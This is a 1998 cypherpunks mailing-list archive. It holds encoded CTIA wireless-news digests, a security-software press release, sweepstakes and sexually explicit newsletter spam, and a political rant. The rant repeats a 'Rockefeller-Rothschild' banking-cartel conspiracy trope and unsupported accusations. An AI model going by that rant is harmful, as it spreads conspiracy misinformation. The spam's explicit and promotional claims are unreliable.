ZXB0OTgvaXJpZGl1bTA5MTA5OC5odG0iPldBU0hQT1NUPC9BPikKKDxBIEhS
RUY9Imh0dHA6Ly93d3cubnl0aW1lcy5jb20vbGlicmFyeS90ZWNoLzk4LzA5
L2JpenRlY2gvYXJ0aWNsZXMvMTBiaXJkLmh0bWwiPk5ZVDwvQT4pCig8QSBI
UkVGPSJodHRwOi8vY2hpY2Fnb3RyaWJ1bmUuY29tL2J1c2luZXNzL2J1c2lu
ZXNzbmV3cy9hcnRpY2xlLzAsMTA1MSxBUlQtMTQ0MTEsMDAuaHRtbCI+Q0hJ
Q0FHTzwvQT4pCig8QSBIUkVGPSJodHRwOi8vY25uZm4uY29tL2RpZ2l0YWxq
YW0vOTgwOS8wOS9pcmlkaXVtLyI+Q05OPC9BPikgKDxBIEhSRUY9Imh0dHA6
Ly93d3cud2lyZWQuY29tL25ld3MvbmV3cy9idXNpbmVzcy9zdG9yeS8xNDkx
MC5odG1sIj5XSVJFRDwvQT4pCig8QSBIUkVGPSJodHRwOi8vd3d3LnpkbmV0
LmNvbS9pbnR3ZWVrL2RhaWx5Lzk4MDkwOWUuaHRtbCI+WkRORVQ8L0E+KTwv
Rk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5QaG9uZSBCaWxscyBBcmUgQ29uZnVzaW5nClRvIEN1c3RvbWVy
czwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij5GQ0MgQ2hhaXJtYW4gQmlsbCBLZW5uYXJkIGFuZCB0ZWxlcGhvbmUKcmVn
dWxhdG9ycyBhcmUgZXhwZWN0ZWQgdG8gaXNzdWUgcHJvcG9zYWxzIHRvIG1h
a2UgcGhvbmUgYmlsbHMgbGVzcyBjb25mdXNpbmcKdG8gY3VzdG9tZXJzLiZu
YnNwOyBBcyBvZiByaWdodCBub3csIHRlbGVwaG9uZSBjb21wYW5pZXMgY2Fu
IGRlY2lkZSBob3cKdG8gbGlzdCBhbmQgZXhwbGFpbiBjaGFyZ2VzLiAoPEEg
SFJFRj0iaHR0cDovL3d3dy51c2F0b2RheS5jb20vbGlmZS9jeWJlci90ZWNo
L2N0ZDQzMS5odG0iPlVTQVRPREFZPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RnJlc25vIE1h
eSBTZXQgTmV3IFJ1bGVzCkNlbGwtUGhvbmUgVG93ZXJzPC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNpdHkgYW5kIGNv
dW50eSBwbGFuIHRvIGRldmVsb3Agc3BlY2lmaWMKcmVndWxhdGlvbnMgZm9y
IHdpcmVsZXNzIGNvbW11bmljYXRpb25zLiAoPEEgSFJFRj0iaHR0cDovL3d3
dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Npb25hbC9uZXdzL2JvZHlf
bmV3cy5jZm0/TkVXU19JRD0zNDA0Ij5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
Q2hyaXN0b3BoZXIgUHV0YWxhIE5hbWVkCkNUSUEgVmljZSBQcmVzaWRlbnQg
Rm9yIENvbmdyZXNzaW9uYWwgQWZmYWlyczwvRk9OVD48L0ZPTlQ+PC9CPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5Gb3JtZXIgdG9wIFNlbmF0ZSBz
dGFmZmVyIGpvaW5zIENUSUEncwpsb2JieWluZyBzaG9wLiAoPEEgSFJFRj0i
aHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Npb25hbC9u
ZXdzL2JvZHlfbmV3cy5jZm0/TkVXU19JRD0zNDA1Ij5XT1ctQ09NPC9BPik8
L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05U
IFNJWkU9KzE+QUxMVEVMIE5hbWUgR29lcyBVcCBPbgozNjAgTG9jYXRpb25z
PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PkFMTFRFTCBpcyBjaGFuZ2luZyB0aGUgbmFtZSBvZiAzNjAgQ29tbXVuaWNh
dGlvbnMKQ29tcGFueSBpbiBuZWFybHkgMjAwIGNpdGllcyB0byB0aGUgQUxM
VEVMIGJyYW5kIG5hbWUgYXMgYSByZXN1bHQgb2YgdGhlCm1lcmdlciBiZXR3
ZWVuIHRoZSB0d28gY29tcGFuaWVzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5u
ZXdzY29tLmNvbS9jZ2ktYmluL3BybmgvMTk5ODA5MDkvREFXMDA5Ij5ORVdT
Q09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9KzE+U2llbWVucyBQbGFucyBIaWdoLVN0eWxlCk1v
YmlsZSBQaG9uZXMgaW4gQWQgQ2FtcGFpZ248L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+Q29tcGFueSB3aWxsIGZlYXR1
cmUgY3V0dGluZyBlZGdlIGNsb3RoaW5nCmRlc2lnbmVyLiAoPEEgSFJFRj0i
aHR0cDovL2ludGVyYWN0aXZlLndzai5jb20vYXJ0aWNsZXMvU0I5MDUzNzg1
OTM1OTg4MjkwMDAuaHRtIj5XU0o8L0E+KTwvRk9OVD48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEw
MCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0x
PkZvciBhZGRpdGlvbmFsIG5ld3MgYWJvdXQKdGhlIHdpcmVsZXNzIGluZHVz
dHJ5LS1pbmNsdWRpbmcgcGVyaW9kaWMgbmV3cyB1cGRhdGVzIHRocm91Z2hv
dXQgdGhlIGRheS0tdmlzaXQKPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29t
LmNvbSI+aHR0cDovL3d3dy53b3ctY29tLmNvbS48L0E+PC9GT05UPjwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
Pgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPS0xPkNUSUEgRGFpbHkgTmV3cyBmcm9tIFdPVy1DT00K
aXMgdHJhbnNtaXR0ZWQgd2Vla2RheXMsIGV4Y2VwdCBmb3IgaG9saWRheXMu
IFZpc2l0IHVzIG9uIHRoZSBXb3JsZCBXaWRlCldlYiBhdCA8QSBIUkVGPSJo
dHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbCI+aHR0cDovL3d3
dy53b3ctY29tLmNvbS9wcm9mZXNzaW9uYWw8L0E+LiZuYnNwOzwvRk9OVD48
L0ZPTlQ+Jm5ic3A7Cgo8UD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9LTE+SWYgeW91IGFyZSBub3QgaW50ZXJlc3RlZAppbiBy
ZWNlaXZpbmcgdGhlIENUSUEgRGFpbHkgTmV3cyBmcm9tIFdPVy1DT00sIHBs
ZWFzZSBzZW5kIGEgbWVzc2FnZSB0bwo8QSBIUkVGPSJtYWlsdG86dW5qb2lu
LUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNvbSI+dW5qb2luLUNU
SUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNvbTwvQT4uJm5ic3A7PC9G
T05UPjwvRk9OVD4mbmJzcDsKCjxQPjxCPioqKjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT4gVGhlIHRlcm0gInVuam9pbi1D
VElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5jb20iCm11c3QgYmUgbGlz
dGVkIGluIHRoZSBUTyBzZWN0aW9uIG9mIHRoZSBlbWFpbC48L0ZPTlQ+PC9G
T05UPiAqKio8L0I+Jm5ic3A7Cgo8UD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9LTE+UGxlYXNlIE5vdGU6IFNvbWUgb2YgdGhl
CmxpbmtzIGluIHRvZGF5J3MgbmV3cyBhcmUgdGltZSBzZW5zaXRpdmUuJm5i
c3A7IFRob3NlIGxpbmtzIG1heSBub3QgYmUKYXZhaWxhYmxlIGFzIG5ld3Mg
Y2hhbmdlcyB0aHJvdWdob3V0IHRoZSBkYXkuJm5ic3A7IEFsc28sIHNvbWUg
bmV3cyBzb3VyY2VzCm1heSBiZSBzdWJzY3JpcHRpb24tYmFzZWQgb3IgcmVx
dWlyZSByZWdpc3RyYXRpb24uPC9GT05UPjwvRk9OVD48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEw
MCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4K
CjxDRU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8L0JPRFk+CjwvSFRNTD4K
--Boundary..3996.1071713804.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Thu, 10 Sep 1998 11:44:51 -0700 (PDT)
To: (STUFFED THURSDAY SEPTEMBER 10 1998)
Subject: NEW MEGA FAST INTERFACE FROM TODAY + 30 HOT JPEGS AT LIGHTNING DOWNLOAD SPEED
Message-ID: <19980910164827.12223.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


In today's super-fast, totally revamped Stuffed
you'll find there's much more than ever before!

30 SCORCHING JPEGS .......... FIVE SEXY STORIES
NET SEX THERAPY ...... DRIVE THROUGH WHOREHOUSE
TOO CHEAP FOR SEX . SUPERMARKET SKIRT SNATCHING
FILMS TO FUCK BY ...................... SEX BED
TRUCK ME BABY .. TALKING DICK SPEAKS PORTUGUESE
BVD BANDIT BUSTED ................ LEO_S LIZARD
FRANTIC PHALLIC FRESCOS .......... PLONKER BOMB
BEST OF EUREKA ............... MUCH, MUCH MORE!

       ---->   http://stuffed.net/98/9/10/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/10/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: win@winwinwin.com
Date: Thu, 10 Sep 1998 18:18:36 -0700 (PDT)
To: anyone@your_server.com
Subject: You and your guest could be the lucky winners.
Message-ID: <199573420021.G5398874@winwinwin.com>
MIME-Version: 1.0
Content-Type: text/plain


    Win a FREE vacation at:   http://www.winwinwin.com

               *****  WIN A FREE VACATION  ****

You and your guest could be the lucky winners.

Through this online registration service, you may register daily for 
vacations to Puerto Vallarta, Disney World, Palm Springs, and many other 
"Vacation-hot-spots."

With the help of our reputable Sponsors, winwinwin.com is pleased to 
offer this incredible Free Vacation Giveaway! There is no purchase 
necessary and entering the sweepstakes is easy.

Point your browser to http://www.winwinwin.com and register now!

This web site now uses "Cookies Technology".  What this means is that 
once you have successfully registered to win a Free Vacation, all of 
your information will be saved in our database, and as long as your 
"Cookies" are active you will not need to re-enter any information 
into the submit form.  Also, every time you visit one of our sponsors 
you will automatically be registered again to win a Free Vacation!  WOW!  
A free entry every time you visit one of our sponsors!  So, please...  
visit as many sponsors as you would like, because it will increase your 
chances of being chosen.

To our winners: we have made arrangements for you and someone special
to enjoy your choice of several FREE deluxe Hotel Accommodation Packages.

We are aware of the rigmarole of your complex and busy lives. That is 
why we have found a solution that will help ease your stress by allowing 
you the opportunity to choose from a selection of resort retreat-spots.

So, please... sit back and be free of worries! Take advantage of this free
online service. Who knows... before you know it, you might just be basking
on the beach or "playing it up" in Atlantic City.

You are welcome to come back and re-submit as often as you please, however
players are limited to only one entry per day (and NOW, you can re-submit
once per day per sponsor).

In return for this great service, we would like to ask that you please 
spread the word. There are plenty of vacations available...  please tell 
your friends and family to give us a visit.

Visit us at http://www.winwinwin.com today.

For more information or to get started as an authorized Sponsor of
WinWinWin.com, email us at sponsors@glaid.com. We will be glad to discuss
the entire program with you in detail and help you get started!

Regards,

The WinWinWin.com Team

EMAIL:  info@winwinwin.com
WEB:    http://www.winwinwin.com

--------------------------------------------------------------------------
This email is never sent unsolicited. This is a WinWinWin.com mailing! -03
Per Section 301, Paragraph (a) (2) (C) of S. 1618, further transmissions
to you by the sender of this email may be stopped at no cost to you by
-forwarding- this entire message to remove@winwinwin.com.
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html
--------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita =?iso-8859-1?Q?N=E4sman=2DRepo?= <Marita.Nasman-Repo@DataFellows.com>
Date: Thu, 10 Sep 1998 11:05:18 -0700 (PDT)
To: F-SECURE-Press-global@DataFellows.com
Subject: PRESS RELEASE: Data Fellows Introduces F-Secure NameSurfer Version 2.0
Message-ID: <3.0.32.19980910174328.009258c0@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain


For your information:

#######################################################

Data Fellows Introduces F-Secure NameSurfer Version 2.0   

SAN JOSE, CA -- Data Fellows, the global leader in Internet security
solutions, has today announced the new version 2.0 of its F-Secure
NameSurfer DNS (Domain Name System) management tool. 

DNS translates host names to IP addresses and is a critical component of
any IP based network. F-Secure NameSurfer provides network managers an
easy- to-use Web interface for DNS administration, saving time and
maintenance resources. Its intuitive graphical user interface and automatic
error checking prevent network managers from generating faulty DNS data.
Faulty DNS data can bring down the entire IP network, so correctness of DNS
data is essential for reliable and secure Internet and intranets. 

F-Secure NameSurfer 2.0 has been extensively restructured to achieve
peerless performance in the markets, especially in large DNS installations.
The new version also makes it possible to prevent the network manager from
creating address records whose IP address falls outside his own network.
Thus, ISPs can give their customers the permission to change addresses and
still be sure that customers stay in their own network zone. 

F-Secure NameSurfer translates into significant savings in network
management. The intuitive graphical user interface saves network managers'
time in doing DNS configurations. The configurations can be done remotely
and by multiple network managers with personal administration rights. The
routine tasks can be delegated to clerical staff. Ultimately even end-users
or ISP customers can administer their own DNS data, with a Web browser, as
a self-service. 

Prime target customer groups for F-Secure NameSurfer are telecommunication
operators, Internet Service Providers (ISP), and other organizations that
need the best tool in the markets to manage Internet or intranet security.
Among F-Secure NameSurfer customers are ISPs like US WEST INTERACT,
Concentric Network Corporation, and The Finnish University and Research
Network, as well as international corporate customers such as Barclays Bank
PLC, Motorola Semiconductor Product Services, and UPM-Kymmene.

F-Secure NameSurfer 2.0 is now available from Data Fellows' resellers
around the world. The product is available for all the popular Unix
platforms. Pricing starts at $990.

With offices in San Jose, CA, and Helsinki, Finland, privately-owned Data
Fellows is the leading technology provider of data security solutions for
computer networks and desktop computers. The company's F-Secure data
security product line includes the groundbreaking F-Secure Anti-Virus,
which facilitates two of the world's best scanning engines, F-PROT
Professional and AVP, within the same system for unparalleled virus
detection rates; F-Secure SSH for securing all popular TCP/IP applications;
and F-Secure VPN for creating secure virtual private networks. The
company's products are relied on by many of the world's largest companies,
governments, universities and institutions. The products are available
world-wide in more than 80 countries through Data Fellows and its business
partners. 

For more information, please contact 

USA: 

Data Fellows Inc.
Mr. Pirkka Palomaki, Product Manager
Tel. +1 408 938 6700 
Fax +1 408 938 6701
E-mail: Pirkka.Palomaki@DataFellows.com 

Europe: 

Data Fellows Oy
Mr. Petri Nyman, Director of Sales
PL 24
FIN-02231 ESPOO 
Tel. +358 9 859 900
Fax +358 9 8599 0599
E-mail: Petri.Nyman@DataFellows.com 
All media inquiries: Open City Communications, 212-714-3575 or
Opencity@aol.com

###########################################################

Kind regards

Marita Nasman-Repo
Communicator, Media Relations



--
marita.nasman-repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Thu, 10 Sep 1998 20:36:06 -0700 (PDT)
To: Undisclosed recipients:  ;
Subject: tickling the cheshire cat
In-Reply-To: <3.0.3.32.19980910152608.0367d6cc@earthlink.net>
Message-ID: <Pine.BSF.3.96.980910212709.550Z-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



    let's see, the banks other than the select few bankers' banks and
    the Rockefeller-Rothschild central bank cartels are out 'n' billion,
    but that only represents an infinitesimal fraction of the middle class
    loss since it's paper to the banks, but life savings to the middle class.

    Thailand, Indonesia, Malaysia, Korea --the pet tigers of the US-Brit
    money cartels all propped up, but actually setup by the IMF and their
    rules which destroy their infrastructure in favour of the cartel.
    suckers one, suckers all.

    Japan started it all with their economic isolation, multi-level
    cronyism, state sponsored economic terror, and scientific cannibalism.
    Japan sits on 50% crony-deals and the banks are falling like dominoes,
    but Japan today is Japan for centuries; they wont take their medicine.

    The Arabs are in hock up to their headbands and real income in
    Saudi Arabia has fallen from 14,000 in 1991 to less than 4,000
    today...  but, now they wont fight each other as they found the 
    common unifier as the Tomahawk IIs crashed into Sudan and 
    Afghanistan.

    Italy, France, and even Germany cooked their books to make the
    Masstricht and Germany suffers from 13% unemployment; the EC can not 
    afford their socialism and Kohl will need a new dinner table.

    Russia caves in after the mob bilked the international money market
    for over $500 billion!  the summit of the doomed: pairing a demented,
    addled drunk with a moral bankrupt went Saturday Night Live...

    and the only two economies which have been able to maintain their
    standard of living are watching...

    meanwhile, Rubin cooks the books, steals the Social Security
    Administration's kitty for unfunded IOUs.  the export of money
    grows and grows and grows --to China, whose state planned economy
    is as crony booked as Japan and China is preoccupied with learning
    to swim.

    Clinton thinks he can apologize for anything and Blair is playing
    cards in the back room. Ambrose came back to Washington to wait 
    for the kill. forget the report to Congress, give the backup
    material the fraudulent duo buried in 100 graves to hollyweird 
    --they wont need new plots for years.

    follow the money... dont worry about value; it's only relevant.

	attila out...    tickling the chesire cat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Fri, 11 Sep 1998 09:35:23 -0700 (PDT)
To: (STUFFED FRIDAY SEPTEMBER 11 1998)
Subject: NEW MEGA FAST INTERFACE + 30 ULTRA HOT JPEGS AT LIGHTNING DOWNLOAD SPEED
Message-ID: <19980911071000.26675.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


In today's super-fast, totally revamped Stuffed
you'll find there's much more than ever before!

   IN TODAY'S ISSUE: X-RATED BASEBALL; ARMPIT
   ASS ATTRACTER; 10 BEST AND WORST THINGS A
     GUY CAN DO AFTER SEX; THE PERFECT BABE;
    THE PERFECT DUDE; BEST OF EUREKA; OCEAN
     LOVE POTION; CALIFORNIA COCK-TASTING
      PARTY; PUBLIC STRIPPING; ORGASM DRUG
                  DISCOVERED

       ---->   http://stuffed.net/98/9/11/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/11/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 11 Sep 1998 09:03:06 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 11, 1998
Message-ID: <199809111559.KAA08514@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713804.multipart/mixed"

--Boundary..3996.1071713804.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit



==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

The future of your company will be announced
October 12 @ Wireless I.T.  Will you be there?

CLICK HERE NOW TO SIGN UP AND SAVE
http://www.wirelessit.com/portal.htm

Team WOW-COM
wowcom@ctia.org
===========================================

--Boundary..3996.1071713804.multipart/mixed
Content-Type: application/octet-stream; name="bin00015.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00015.bin"
Content-Description: "_CTIA_Daily_News_19980911a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9wcm9mZXNzaW9uYWwvY29udmVudGlvbi93c2VjdXJpdHkvaW5k
ZXguY2ZtIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFn
ZXMvcHJvZmVzc2lvbmFsL2NvbnZlbnRpb24vd3NlY3VyaXR5OTguZ2lmIiBB
TFQ9IlRvZGF5J3MgTmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgU0VDVVJJ
VFkgOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NzUgV0lEVEg9MTc1Pjwv
QT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxD
RU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9
MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5l
d3MgZnJvbSBXT1ctQ09NIC0gU2VwdGVtYmVyIDExLCAxOTk4PC9GT05UPjwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5Nb3Rvcm9sYSBBbm5v
dW5jZXMgJDEwMApNaWxsaW9uIENlbGx1bGFyIFBob25lIERlYWw8L0ZPTlQ+
PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QmVsbCBB
dGxhbnRpYyBNb2JpbGUgc2VsZWN0cyBNb3Rvcm9sYSdzCkNETUEgRGlnaXRh
bCBQaG9uZSBUZWNobm9sb2d5IGZvciBOZXcgU2luZ2xlUmF0ZZkgSW50cm9k
dWN0aW9uLiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1
bHRzL3Byb2Zlc3Npb25hbC9uZXdzL2JvZHlfbmV3cy5jZm0/TkVXU19JRD0z
NDA5Ij5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+TkVDIGFuZCBMdWNlbnQgV29y
ayBUb2dldGhlcgpUbyBEZXZlbG9wIE5ldyBDaGlwczwvRk9OVD48L0ZPTlQ+
PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5ORUMgQ29ycG9yYXRp
b24gYW5kIEx1Y2VudCBUZWNobm9sb2dpZXMKaGF2ZSBqb2luZWQgZm9yY2Vz
IHRvIGRldmVsb3AgY2hpcHMgdGhhdCB3b3VsZCBzdXBwb3J0IGRpZ2l0YWwg
YXBwbGlhbmNlcwphbmQgbmV4dC1nZW5lcmF0aW9uIGNvbW11bmljYXRpb25z
IHN5c3RlbXMuICg8QSBIUkVGPSJodHRwOi8vd3d3LmxhdGltZXMuY29tL0hP
TUUvTkVXUy9CVVNJTkVTUy90MDAwMDgyNTMyLjEuaHRtbCI+TEFUSU1FUzwv
QT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPSsxPlFVQUxDT01NIEFubm91bmNlcyBEYXRlCmZvciBTcGlu
LW9mZiBvZiBMZWFwIFdpcmVsZXNzIEludGVybmF0aW9uYWw7IE5ldyBHbG9i
YWwgV2lyZWxlc3MgQ2Fycmllcgp0byBGb2N1cyBvbiBFbWVyZ2luZyBNYXJr
ZXRzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPlFVQUxDT01NIEluY29ycG9yYXRlZCAoTmFzZGFxOiBRQ09NKSB0b2Rh
eQphbm5vdW5jZWQgdGhhdCBpdHMgQm9hcmQgb2YgRGlyZWN0b3JzIGhhcyBh
